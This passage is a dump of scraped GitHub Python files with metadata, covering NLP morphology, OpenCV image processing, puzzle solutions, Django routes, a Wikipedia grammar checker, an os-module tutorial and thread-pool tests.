logging.info(f\"{len(generated)} {'word' if len(generated) == 1 else 'words'} generated.\")\n \n return None if len(generated) == 0 else str(generated[0].surface)\n\n \n def 
change_stem_of_analysed_word(self, source_word, target_word):\n\n new_stem: self.DictionaryItem = (\n self.morphology.getLexicon().getMatchingItems(target_word).get(0)\n )\n\n logging.debug(f\"Lexicon for {target_word} is: {self.morphology.getLexicon().getMatchingItems(target_word).get(0)}\")\n logging.debug(f\"Dict Item of above lexicon {new_stem}\")\n\n # print(type(source_word[\"morphemes\"]))\n generated: java.util.ArrayList = (\n self.morphology.getWordGenerator().generate(\n new_stem, source_word[\"morphemes\"]\n )\n )\n\n \n # for gen_word in generated:\n # print(\n # f'\\nInput Analysis: {source_word[\"dictFormStr\"]}'\n # f'\\nAfter Stem Change, Word: {str(gen_word.surface)}'\n # '\\nAfter Stem Change, Analysis:'\n # f'{str(gen_word.analysis.formatLong())}'\n # )\n \n logging.info(f\"{len(generated)} {'word' if len(generated) == 1 else 'words'} generated.\")\n \n return None if len(generated) == 0 else str(generated[0].surface)\n","repo_name":"lapestand/lacivert-nlp","sub_path":"lacivert/turkish_nltk/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"37215845319","text":"import cv2\nimport numpy as np\n\n\nimg = cv2.imread('images/b1.jpg')\nprint(img.shape)\n\n# resize\nnew_img1 = cv2.resize(img, (img.shape[1] // 2, img.shape[0] // 2))\n\n# cutting\nnew_img2 = img[0:100, 0:150]\n\n# blurring (only odd values in tuple)\nnew_img3 = cv2.GaussianBlur(img, (59, 59), 10)\n\n# change color format\nnew_img4 = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# edge detection\nnew_img5 = cv2.Canny(img, 100, 100)\n\n# dilation and erosion\nkernel = np.ones((5, 5), np.uint8)\nnew_img6 = cv2.dilate(img, kernel, iterations=1)\nnew_img7 = cv2.erode(img, kernel, iterations=10)\n\n\ncv2.imshow('Result', new_img7)\ncv2.waitKey(0)\n\n","repo_name":"SamorodovAI/OpenCV_scripts","sub_path":"pic_sizing.py","file_name":"pic_sizing.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17185919708","text":"import sys\r\nfrom collections import deque\r\nimport copy\r\n\r\n\r\ndef back_tracking(idx):\r\n if len(tmp) == m:\r\n virus_set.append(copy.deepcopy(tmp))\r\n return\r\n\r\n for i in range(idx,len(virus_num)):\r\n if i not in tmp:\r\n tmp.append(i)\r\n back_tracking(i+1)\r\n tmp.pop()\r\n\r\ndef bfs():\r\n graph_copy = copy.deepcopy(graph)\r\n cnt = 0\r\n total = 0\r\n\r\n for g in graph_copy:\r\n total += g.count(0)\r\n\r\n while queue:\r\n cur_x, cur_y,d = queue.popleft()\r\n fl = False\r\n\r\n for i in range(4):\r\n nx = cur_x + dx[i]\r\n ny = cur_y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < n:\r\n if graph_copy[nx][ny] == 0 or graph_copy[nx][ny] == 2:\r\n if graph_copy[nx][ny] == 0:\r\n cnt += 1\r\n graph_copy[nx][ny] = 3\r\n queue.append((nx,ny,d+1))\r\n if cnt == total:\r\n break\r\n\r\n if cnt != total:\r\n return -1\r\n\r\n return d\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n\r\n n, m = map(int,input().split())\r\n\r\n virus = []\r\n\r\n dx = [-1,1,0,0]\r\n dy = [0,0,-1,1]\r\n\r\n graph = []\r\n for i in range(n):\r\n tmp = list(map(int,input().split()))\r\n graph.append(tmp)\r\n for j in range(n):\r\n if tmp[j] == 2:\r\n virus.append((i,j,0))\r\n\r\n virus_num = [i for i in range(len(virus))]\r\n virus_set = []\r\n tmp = []\r\n\r\n back_tracking(0)\r\n\r\n min = 1e9\r\n\r\n ans = []\r\n for i in range(len(virus_set)):\r\n queue = 
deque()\r\n for k in virus_set[i]:\r\n queue.append(virus[k])\r\n\r\n result = bfs()\r\n\r\n\r\n if min > result and result != -1:\r\n min = result\r\n\r\n if min == 1e9:\r\n min = -1\r\n print(min)","repo_name":"parkchanbin54/boj","sub_path":"백준/Gold/17142. 연구소 3/연구소 3.py","file_name":"연구소 3.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41566796648","text":"def get_input(path):\n data = None\n with open(path) as f:\n data = f.readlines()\n data = [line for line in data if line[0] != '\\n']\n data = [eval(line) for line in data]\n return data\n\ndef rec_process(left, right):\n '''Returns are -1, 0, 1 in order to pass this as an argument for sorted()'''\n #print(f\"left= {left} right = {right}\")\n \n # if two ints:\n if type(left) == int and type(right) == int:\n if left == right:\n return False\n elif left < right:\n return 1\n else:\n return -1\n\n # if one int and one list\n if type(left) == int and type(right) == list:\n return rec_process([left], right)\n if type(left) == list and type(right) == int:\n return rec_process(left, [right])\n\n # if two lists, recurse\n count = 0\n while count < min([len(left), len(right)]):\n check = rec_process(left[count], right[count])\n if check == 0:\n pass\n elif check == 1:\n return 1\n else:\n return -1\n count += 1\n \n # then if one list shorter than the other\n if len(left) < len(right):\n return 1\n elif len(right) < len(left):\n return -1\n else:\n return 0\n\n# to make part 2 dead easy, we use cmp_to_key for the sorted method\nimport functools\n\ndef d13_1(data):\n pairs = []\n for i in range(0, len(data), 2):\n pairs.append((data[i], data[i+1]))\n \n pairs = [rec_process(pair[0], pair[1]) for pair in pairs]\n addends = []\n for i in range(len(pairs)):\n if pairs[i] == 1:\n addends.append(i + 1)\n return sum(addends)\n\ndef d13_2(data:list):\n data.append([[2]])\n data.append([[6]])\n # this is where the magic happens\n data = sorted(data, key=functools.cmp_to_key(rec_process), reverse=True)\n ret = (data.index([[2]]) + 1) * (data.index([[6]]) + 1)\n return ret\n\nif __name__ == \"__main__\":\n p1 = \"res.txt\"\n p2 = \"sample.txt\"\n data = get_input(p1)\n r1 = d13_1(data)\n r2 = d13_2(data)\n print(\"answer 1:\", r1)\n print(\"answer:\", r2)","repo_name":"loydp/Advent_of_Code","sub_path":"2022/d13/d13.py","file_name":"d13.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26238001048","text":"from django.urls import include, path\nfrom django.conf.urls import url\nimport ordersapp.views as ordersapp\n\nfrom . 
import views\n\nurlpatterns = [\n path('create/date/', views.DateCreateView.as_view()),\n path('create/period/', views.PeriodCreateView.as_view()),\n path('create/order/', views.OrderCreateView.as_view()),\n path('order////', views.OrderView.as_view()),\n path('dates/', views.DateListView.as_view()),\n path('date/<int:pk>/', views.DateView.as_view()),\n path('periods/', views.PeriodListView.as_view()),\n path('period/<int:pk>/', views.PeriodView.as_view()),\n path('create/card/', views.ClientCardCreateView.as_view()),\n path('create/card_item/', views.CardItemCreateView.as_view()),\n path('card/all/', views.ClientCardsListView.as_view()),\n path('card/<int:pk>/', views.ClientCardListView.as_view()),\n path('card/activate/<int:pk>/', views.CardActivateView.as_view()),\n path('card_items/all/', views.CardItemListView.as_view()),\n path('create/basket/', views.BasketCreateView.as_view()),\n #path('basket/<int:pk>/', views.BasketListView.as_view()),\n path('basket/', views.BasketListView.as_view()),\n path('basket/all/', views.BasketOnlyIdView.as_view()),\n path('basket/del/<int:pk>/', views.BasketDeleteView.as_view()),\n\n url(r'^email/(?P<email>[\w.%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4})/', ordersapp.send_email_with_attach)\n\n #path('basket/last/<int:pk>/', views.BasketLastListView.as_view()),\n]","repo_name":"spoliv/FitClubBot","sub_path":"fitclub/ordersapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"70874688253","text":"termo = int(input('Enter a term: '))\r\nc = 0\r\nt = 0\r\nwhile c != termo:\r\n c = c + 1\r\n t = t + 1\r\n x = (1.618034)**t - (1-1.618034)**t\r\n raiz = 5**0.5\r\n fibo = x / raiz\r\n print(round(fibo), end='> ')\r\nprint('\\nFibonacci term {} is: {} '.format(termo,round(fibo)))\r\n\r\n","repo_name":"eduardofmarcos/Python","sub_path":"56 - fibonacci_c_formula.py","file_name":"56 - fibonacci_c_formula.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"3710128120","text":"# Encyclopedia style rules:\n# * Implied you not allowed?\n# * Abbreviation rules\n# * Punctuation rules\n# \" not '\n# terminal punctuation and quotes\n# comma style (Oxford comma mandatory!)\n\n\n# Use cases:\n# * Suggest edits for a specific article\n# * Command line from file\n# * Command line from Wikipedia API\n# * JavaScript\n# * Report on theory of English grammar\n\n\nimport mysql.connector\nimport nltk\nimport re\nimport stopit\nimport sys\nimport time\nfrom english_grammar import (enwiktionary_cat_to_pos,\n phrase_structures,\n closed_lexicon,\n vocab_overrides)\nfrom pywikibot import Page, Site\nfrom wikitext_util import wikitext_to_plaintext, get_main_body_wikitext, blockquote_re\n\n\nmysql_connection = mysql.connector.connect(user='beland',\n host='127.0.0.1',\n database='enwiktionary')\n\n\n# TODO: Use this for visualization. 
Would be interesting to see\n# curves for articles rated Featured, A, B, Good, C, Start, Stub, etc.\ndef generate_stats(plaintext):\n print(\"sentences per paragraph\\twords per paragraph\\tmax words per paragraph\")\n paragraphs = plaintext.split(\"\\n\")\n for paragraph in paragraphs:\n words_in_paragraph = nltk.word_tokenize(paragraph)\n if len(words_in_paragraph) == 0:\n continue\n\n sentences = nltk.sent_tokenize(paragraph)\n max_words_per_sentence = 0\n for sentence in sentences:\n words = nltk.word_tokenize(sentence)\n if len(words) > max_words_per_sentence:\n max_words_per_sentence = len(words)\n\n print(\"%s\\t%s\\t%s\" % (len(sentences), len(words_in_paragraph), max_words_per_sentence))\n\n\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Numbers\n# Includes integers, decimal fractions, ratios\nnumber_pattern = r\"(\d+|\d+\.\d+|\d+:\d)\"\nconforming_number_re = re.compile(r\"^%s$\" % number_pattern)\nordinal_re = re.compile(r\"^\d*(1st|2nd|3rd|4th|5th|6th|7th|8th|9th|0th)$\")\n\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Currencies_and_monetary_values\ncurrency_pattern = \"|\".join(closed_lexicon[\"CUR\"])\ncurrency_pattern = currency_pattern.replace(\"$\", \"\\\\$\")\nconforming_currency_re = re.compile(\"^(%s)%s(M|bn)?$\" % (currency_pattern, number_pattern))\n# M for million, bn for billion per\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Currencies_and_monetary_values\n\n# Must be an integer\nSENTENCE_TIMEOUT_SEC = 1\n\n\nrepair_dot_re = re.compile(r\"([A-Z]\.[A-Z]$)|(^[A-Z]$)\")\n\n\ndef repair_tokenization(words_in):\n # Fix \"i.e.\", \"R.E.M.\", etc.\n words_out = []\n for word in words_in:\n # No word to append to\n if not words_out:\n words_out.append(word)\n continue\n\n if word == \".\" and repair_dot_re.search(words_out[-1]):\n words_out[-1] += word\n continue\n\n words_out.append(word)\n\n return words_out\n\n\ndef check_english(wikitext, title):\n # Output is to stdout with tab-separated fields:\n # * Type of message\n # S = spelling problem\n # G = grammar problem\n # L = length issues\n # U = Unsupported construct\n # ! 
= parse failure\n # * Article title\n # * Message\n # * Details\n\n # if (TODO: CONSOLIDATE WITH moss_spell_check.py):\n # print(\"!\\tArticle parse broken?\\t%s\" % title)\n # return\n\n # TODO: Block equations can be introduced with lines like \"Then\"\n # or \"Maxwell's laws are\" and lots of different variations.\n if \"<math\" in wikitext:\n print(f\"U\\t{title}\\t<math> detected, skipping article\")\n return\n\n if \"#REDIRECT\" in wikitext:\n print(f\"U\\t{title}\\tRedirect detected, skipping article\")\n return\n\n # Ignore bad grammar in quotations and poems\n wikitext = blockquote_re.sub(\"✂\", wikitext)\n\n plaintext = get_main_body_wikitext(wikitext_to_plaintext(wikitext), strong=True)\n sentences = []\n\n # Tokenizing paragraphs individually helps prevent NLTK from\n # getting confused by some situations, like list items.\n paragraphs = plaintext.split(\"\\n\")\n for paragraph in paragraphs:\n words_in_paragraph = nltk.word_tokenize(paragraph)\n if len(words_in_paragraph) > 500:\n print(\"L\\t%s\\tOverly long paragraph?\\t%s words\\t%s\" % (title, len(words_in_paragraph), paragraph))\n\n sentences.extend(nltk.sent_tokenize(paragraph))\n\n # Parse the short sentences first since they should be\n # easiest.\n sentences.sort(key=lambda s: len(s))\n\n for sentence in sentences:\n start_time = time.time()\n\n if \"✂\" in sentence:\n # These represent suppressions (hiding things from spell\n # check and grammar check) during the transformation from\n # wikitext, such as templates and quotations.\n\n # TODO: Handle quote marks\n # * They can replace any part of speech, if they parse as that\n # part of speech themselves.\n # * They can contain novel words and errors.\n # * They can be a literal quotation with a \"said\"\n # construction, in which case they don't need to be any\n # particular part of speech. 
(Though maybe they are usually\n # full sentences, unless it's someone blurting out a partial\n # utterance?)\n print(\"U\\t%s\\tSuppression detected, skipping sentence\\t%s\" % (title, sentence))\n continue\n\n words = nltk.word_tokenize(sentence)\n words = repair_tokenization(words)\n if len(words) > 200:\n print(\"L\\t%s\\tOverly long sentence?\\t%s words\\t%s\" % (title, len(words), sentence))\n continue\n\n if len(words) > 15:\n print(\"U\\t%s\\t%s words, skipping sentence\\t%s\" % (title, len(words), sentence))\n continue\n\n (grammar_string, word_to_pos) = load_grammar_for_word_list(words)\n is_grammatical = None\n with stopit.SignalTimeout(SENTENCE_TIMEOUT_SEC, swallow_exc=True) as timeout_result:\n is_grammatical = is_sentence_grammatical_beland(words, word_to_pos, title, sentence, grammar_string)\n\n elapsed = time.time() - start_time\n\n if timeout_result.state == timeout_result.TIMED_OUT:\n print(\"T\\t%s\\t%s\\tTIMEOUT\\t%s\" % (elapsed, title, sentence))\n continue\n\n elapsed = time.time() - start_time\n if is_grammatical:\n print(\"Y\\t%s\\t%s\\tYay, parsed sentence successfully!\\t%s\" % (elapsed, title, sentence))\n else:\n print(\"G\\t%s\\t%s\\tUngrammatical sentence?\\t%s\" % (elapsed, title, sentence))\n\n\ndef is_sentence_grammatical_beland(word_list, word_to_pos, title, sentence, grammar_string):\n\n word_train = []\n\n previous_word = None\n for word in word_list:\n expand_grammar = False\n pos_list = word_to_pos.get(word, [])\n\n # Not requiring pos_list be empty because \"Such\" is a proper\n # noun but we need to look up \"such\"\n if previous_word is None and word == word.title():\n tmp_pos_list = word_to_pos.get(word.lower())\n if tmp_pos_list:\n # So that CFG parser can do the POS lookup\n word_list[0] = word.lower()\n pos_list.extend(tmp_pos_list)\n if not pos_list and conforming_number_re.match(word):\n pos_list = [\"NUM\"]\n expand_grammar = True\n if not pos_list and ordinal_re.match(word):\n pos_list = [\"ORD\"]\n expand_grammar = True\n if not pos_list and conforming_currency_re.match(word):\n pos_list = [\"CURNUM\"]\n expand_grammar = True\n if not pos_list and word.isalnum() and word[0].isalpha() and (word[0] == word[0].upper()):\n # Assume all capitalized words and acronyms (allowing some numbers sprinkled in) are proper nouns\n # Including Chris, NASA, GmbH, A380\n pos_list = [\"N\"]\n expand_grammar = True\n if not pos_list and ((word == \"'\" and previous_word is not None and previous_word[-1].lower() == \"s\") or word == \"'s\"):\n pos_list = [\"POSS\"]\n expand_grammar = True\n if \"-\" in word:\n word_parts = word.split(\"-\")\n pos_patterns = []\n for part in word_parts:\n tmp_pos_list = word_to_pos.get(part)\n if not tmp_pos_list:\n tmp_pos_list = word_to_pos.get(part.lower())\n if tmp_pos_list:\n pos_patterns.append(tmp_pos_list)\n else:\n break\n if len(pos_patterns) == len(word_parts) and len(word_parts) == 2:\n if \"ADJ\" in pos_patterns[0] and \"N\" in pos_patterns[1]:\n # e.g. \"blue-hull\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"NUM\" in pos_patterns[0] and \"N\" in pos_patterns[1]:\n # e.g. \"two-hull\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"ADJ\" in pos_patterns[0] and \"ADJ\" in pos_patterns[1]:\n # e.g. \"blue-grey\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif word_parts[0].isnumeric() and \"N\" in pos_patterns[1]:\n # e.g. 15-year\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"ADJ\" in pos_patterns[0] and \"V\" in pos_patterns[1] and word_parts[1][-1] == \"d\":\n # e.g. 
Saudi-led\n # -d is a cheesy way to look for past tense verbs only\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"N\" in pos_patterns[0] and \"V\" in pos_patterns[1] and word_parts[1][-1] == \"d\":\n # e.g. hickory-smoked\n # -d is a cheesy way to look for past tense verbs only\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif word_parts[0].lower() == \"sub\":\n # e.g. sub-contract\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[0].lower() == \"co\":\n # e.g. co-founders, co-founded\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[0].lower() == \"non\":\n # e.g. non-aggression, non-blue\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[1].lower() == \"class\":\n # e.g. Washington-class\n pos_list = [\"ADJ\"]\n expand_grammar = True\n\n if not pos_list:\n print(\"S\\t%s\\t%s\\tNo POS for word\\t%s\" % (word, title, word_list))\n return True\n\n if expand_grammar:\n word_to_pos[word] = pos_list\n for pos in pos_list:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n word_train.append((word, pos_list))\n previous_word = word\n\n print(\"DEBUG\\t%s\" % word_train)\n\n grammar = nltk.CFG.fromstring(grammar_string)\n\n # parser = nltk.parse.RecursiveDescentParser(grammar) # Cannot handle X -> X Y (infinite loop)\n # parser.trace(5)\n # parser = nltk.parse.LeftCornerChartParser(grammar)\n parser = nltk.parse.BottomUpLeftCornerChartParser(grammar)\n # Parsers background: http://www.nltk.org/book/ch08.html\n # Other parsers are available in nltk.parse\n\n # print(grammar)\n\n try:\n possible_parses = parser.parse(word_list)\n except Exception as e:\n print(e)\n return False\n\n seen = []\n possible_parses_dedup = []\n for parse in possible_parses:\n serialized = parse.pformat()\n if serialized in seen:\n print(\"!\\tDROPPED DUP!\")\n continue\n else:\n possible_parses_dedup.append(parse)\n seen.append(serialized)\n # parse_dummies = [parse.pretty_print() for parse in possible_parses_dedup]\n parse_dummies = [parse for parse in possible_parses_dedup]\n if len(parse_dummies) == 0:\n print(\"DEBUG\\t%s\" % word_train)\n return False\n return True\n\n\ndef is_sentence_grammatical_nltk(word_list):\n # \"word_list\" instead of sentence avoids re-tokenizing\n\n tagged = nltk.pos_tag(word_list)\n print(tagged)\n return True\n\n\ndef fetch_article_wikitext(title):\n site = Site()\n page = Page(site, title=title)\n return page.text\n\n\ndef fetch_article_plaintext(title):\n site = Site()\n page = Page(site, title=title)\n plaintext = wikitext_to_plaintext(page.text)\n return get_main_body_wikitext(plaintext, strong=True)\n\n\n# TODO: For later command-line use\ndef check_article(title):\n wikitext = fetch_article_wikitext(title)\n check_english(wikitext, title)\n\n\n# BOOTSTRAPPING\n\n# A quasi-representative sample of topics (for positive testing) from\n# well-written articles listed at:\n# https://en.wikipedia.org/wiki/Wikipedia:Featured_articles\n\nsample_featured_articles = [\n\n # DEBUGGING FILES\n\n # \"0test\",\n\n # FEATURED ARTICLES\n\n \"BAE Systems\",\n \"Evolution\",\n \"Chicago Board of Trade Building\",\n \"ROT13\",\n \"Periodic table\",\n \"Everything Tastes Better with Bacon\",\n \"Renewable energy in Scotland\",\n \"Pigeon photography\",\n \"University of California, Riverside\",\n \"Same-sex marriage in Spain\",\n \"Irish phonology\",\n \"Sentence spacing\",\n # https://en.wikipedia.org/wiki/X%C3%A1_L%E1%BB%A3i_Pagoda_raids\n \"Xá Lợi Pagoda raids\",\n \"Flag of Japan\",\n \"Cerebellum\",\n # 
https://en.wikipedia.org/wiki/L%C5%8D%CA%BBihi_Seamount\n \"Lōʻihi Seamount\",\n \"India\",\n \"To Kill a Mockingbird\",\n \"Edward VIII abdication crisis\",\n # https://en.wikipedia.org/wiki/W%C5%82adys%C5%82aw_II_Jagie%C5%82%C5%82o\n \"Władysław II Jagiełło\",\n \"Atheism\",\n \"Liberal Movement (Australia)\",\n \"Europa (moon)\",\n \"Philosophy of mind\",\n \"R.E.M.\",\n \"Tornado\",\n \"The Hitchhiker's Guide to the Galaxy (radio series)\",\n \"Pi\",\n \"Byzantine navy\",\n \"Wii\",\n \"Mass Rapid Transit (Singapore)\",\n \"History of American football\",\n\n # ARTICLES NEEDING COPYEDIT\n \"Gender inequality in China\"\n]\n\n\ndef check_samples_from_disk():\n for title in sample_featured_articles:\n title_safe = title.replace(\" \", \"_\")\n with open(\"samples/%s\" % title_safe, \"r\") as text_file:\n wikitext = text_file.read()\n check_english(wikitext, title)\n # generate_stats(plaintext)\n\n\ndef save_sample_articles():\n for title in sample_featured_articles:\n wikitext = fetch_article_wikitext(title)\n title_safe = title.replace(\" \", \"_\")\n with open(\"samples/%s\" % title_safe, \"w\") as text_file:\n text_file.write(wikitext)\n\n\n# --- GRAMMAR-MAKING HACK ---\n\n\ndef fetch_parts_of_speech(word):\n # Returns a LIST of parts of speech\n word_categories = fetch_categories(word)\n pos_list = [enwiktionary_cat_to_pos.get(category_name) for category_name in word_categories]\n return [pos for pos in pos_list if pos]\n\n\ndef fetch_categories(word):\n if not word:\n return []\n cursor = mysql_connection.cursor()\n cursor.execute(\"SELECT title, category_name FROM page_categories WHERE title=%s\", (word, ))\n\n # Account for SQL being case-insensitive\n result = [cat.decode('utf8') for (title, cat) in cursor if title.decode('utf8') == word]\n cursor.close()\n return result\n\n\ndef load_grammar_for_word_list(word_list):\n grammar_string = \"\"\n\n # ---\n\n # Load relationships between parts of speech\n\n for (parent_pos, child_structures) in sorted(phrase_structures.items()):\n alternatives = []\n for child_list in child_structures:\n # Strip attributes for now\n child_list = [child.split(\"+\")[0] for child in child_list]\n alternatives.append(\" \".join(child_list))\n grammar_string += \"%s -> %s\\n\" % (parent_pos, \" | \".join(alternatives))\n\n # ---\n\n # Load limited vocabulary (only for words in this text, to\n # minimize the size of the grammar).\n\n word_set = set(word_list)\n\n # Deal with the possibility that some words are only capitalized\n # because they begin a sentence. No harm here in loading a few\n # lowercase variants we won't actually use later.\n more_words = set()\n for word in word_set:\n if word == word.title():\n more_words.add(word.lower())\n if \"-\" in word:\n [more_words.add(part) for part in word.split(\"-\")]\n [more_words.add(part.lower()) for part in word.split(\"-\")]\n word_set = word_set.union(more_words)\n\n word_to_pos = {}\n for word in word_set:\n word_pos_set = set()\n\n if word in vocab_overrides:\n word_pos_set = vocab_overrides[word]\n else:\n [word_pos_set.add(pos) for pos in fetch_parts_of_speech(word)]\n\n if word_pos_set:\n word_to_pos[word] = list(word_pos_set)\n\n for pos in word_pos_set:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n # ---\n\n # Load closed-class vocabulary explicity set by\n # english_grammar.py.\n\n # TODO: This is probably unnecessary; Wiktionary almost certainly\n # has these listed. 
These are currently adding to the grammar, not\n # overriding Wiktionary, so it's unclear if the attributes are\n # going to come through at the other end. (They're currently\n # unused anyway, but that could change.)\n\n for (pos, word_list) in closed_lexicon.items():\n pos = pos.split(\"+\")[0]\n for word in word_list:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n pos_list = word_to_pos.get(word, [])\n pos_list.append(pos)\n word_to_pos[word] = pos_list\n\n return (grammar_string, word_to_pos)\n\n\n# --- RUNTIME ---\n\ndef run_grammar_check():\n if len(sys.argv) > 1 and sys.argv[1] == \"--download\":\n save_sample_articles()\n exit(0)\n\n check_samples_from_disk()\n mysql_connection.close()\n\n\nif __name__ == '__main__':\n run_grammar_check()\n","repo_name":"cdbeland/moss","sub_path":"grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"}
+{"seq_id":"33679700511","text":"import requests\nimport json\nimport sys\nimport os\nimport logging\n\ndef ProcessBool(myBool):\n if(str(type(myBool)) == \"<class 'str'>\"):\n if(myBool in ['True','true','t','yes']):\n return True\n if(myBool in ['False','false','f','no']):\n return False\n else:\n return myBool\n\ndef isAnomalousHtmlResponse(text):\n if(\"<html\" in text):\n return True\n else:\n return False\n\ndef processAPIResponse(response):\n if(response.status_code >= 300):\n if(response.status_code == 500):\n logging.debug(\"CR API Error: {} - Hint: {} - Message: {}\".format(response.status_code, \"Try logging back in.\",response.text))\n print(\"CR API Error: {} - Hint: {} - Message: {}\".format(response.status_code, \"Try logging back in.\",response.text))\n #print(\"API Error Code: \"+str(response.status_code))\n return False\n else:\n logging.debug(\"CR API Error: {} - Message: {}\".format(response.status_code,response.text))\n print(\"CR API Error: {} - Message: {}\".format(response.status_code,response.text))\n #print(\"API Error Code: \"+str(response.status_code))\n return False\n else:\n RespContent = str(response.text)\n if(RespContent.startswith(\"<\")):\n logging.debug(\"CR API Error: {} - Message: {}\".format(response.status_code,\"Response received is in HTML Format\"))\n print(\"CR API Error: {} - Message: {}\".format(response.status_code,\"Response received is in HTML Format\"))\n return False\n else:\n return True\n\ndef ProcessStdResponse(res,CsvOutput):\n CsvOutput = ProcessBool(CsvOutput)\n if isAnomalousHtmlResponse(res.text):\n print(\"Error: You need to log back in.\")\n exit(1)\n if(res.status_code >= 400):\n\n print(\"Error Code: \"+str(res.status_code))\n try:\n result = json.loads(res.text)\n if result['message']:\n print(\"Error Message: \"+result['details'])\n return True,None\n except:\n return True,None\n\n return True,None\n\n else:\n try:\n return False,CsvOutput\n except:\n print(\"Unknown Error.\")\n return True,None\n","repo_name":"brendanSapience/Automation-Anywhere-Control-Room-Command-Line-Interface","sub_path":"responses/StdResponses.py","file_name":"StdResponses.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"27466080198","text":"import os\r\n\r\n# Getting Current Directory\r\n# We use the getcwd() function of the os module to get the path to the current directory.\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\n# When you run the code, the current working 
directory, that is, the directory containing our Python file, is printed.\r\n\"\"\"\r\n# Changing Directory\r\n# In Python, we can change the current working directory by using the chdir() function of the os module.\r\n# As we saw previously, the present working directory is the directory containing our Python file. \r\n# Let's change the current working directory\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\nos.chdir(\"/path/new/location\") # i.e. C:/Users/Danish Khan/PycharmProjects/Python/Example\r\nprint(os.getcwd())\r\n# \r\n# \r\n# Note: Now if we create a file inside the current directory, our file will be created inside <the new directory>.\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\nos.chdir(\"<new directory path>\")\r\nwith open(\"test.txt\", \"w\") as f:\r\n f.write(\"This is a test file.\")\r\n# We can see the test.txt file is created inside the current working directory which is <the new directory>.\r\n\r\n# Listing all Directories and Files\r\n# All files and subdirectories inside a directory can be retrieved using the listdir() function of the os module.\r\nprint(os.listdir()) \r\n# This function returns a list containing all files and subdirectories in the current working directory.\r\n# We can also pass an optional path argument to listdir() to return files and subdirectories from a specific path.\r\nprint(os.listdir(\"<path>\"))\r\n\r\n# Making a New Directory\r\n# We can create a new directory using the mkdir() function of the os module.\r\nos.mkdir(\"test\")\r\n# This creates a new test directory in our current directory.\r\n\r\n# Renaming a Directory or a File\r\n# We can rename any directory or file using the os.rename() function which takes in 2 arguments: old name and new name.\r\n# rename directory or file\r\nos.rename('<old name>', '<new name>')\r\n\r\n# Removing Directory or File\r\n# We can remove a file using the remove() function of the os module.\r\nprint(os.listdir())\r\nos.remove(\"<file name>\")\r\nprint(os.listdir())\r\n# After running this code, the file is deleted, so the second os.listdir() will not list the file.\r\n\r\n# To remove a directory, we use the rmdir() function.\r\nprint(os.listdir())\r\nos.rmdir(\"<directory name>\")\r\nprint(os.listdir())\r\n# Note: One thing we need to remember when removing a directory is that the directory must be empty. 
Otherwise,\r\n# an exception will be raised.\r\n\"\"\"","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Operating System Modules.py","file_name":"Operating System Modules.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"37659539301","text":"import os\nimport threading\nimport time\n\nimport pytest\n\nfrom threadedprocess import ThreadedProcessPoolExecutor\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\n\ndef _get_pid_and_tid():\n return (os.getpid(), threading.current_thread().ident)\n\n\ndef _long_running_task(*_):\n start = time.time()\n time.sleep(1)\n end = time.time()\n return (start, end)\n\n\ndef _return_True():\n return True\n\n\ndef _raise_ValueError():\n raise ValueError\n\n\ndef test_futures_run_in_different_processes_and_threads():\n \"\"\"\n Check that all spawned processes and threads are used to run the submitted\n tasks.\n\n \"\"\"\n futures = []\n\n with ThreadedProcessPoolExecutor(max_processes=4,\n max_threads=4) as executor:\n for i in range(1000):\n futures.append(executor.submit(_get_pid_and_tid))\n\n pids_and_tids = set((f.result() for f in futures))\n\n assert len(pids_and_tids) == 16 # 4 processes, 4 threads\n\n\ndef test_results_return():\n with ThreadedProcessPoolExecutor() as executor:\n f = executor.submit(_return_True)\n\n assert f.result() is True\n\n\ndef test_exceptions_raises():\n with ThreadedProcessPoolExecutor() as executor:\n f = executor.submit(_raise_ValueError)\n\n with 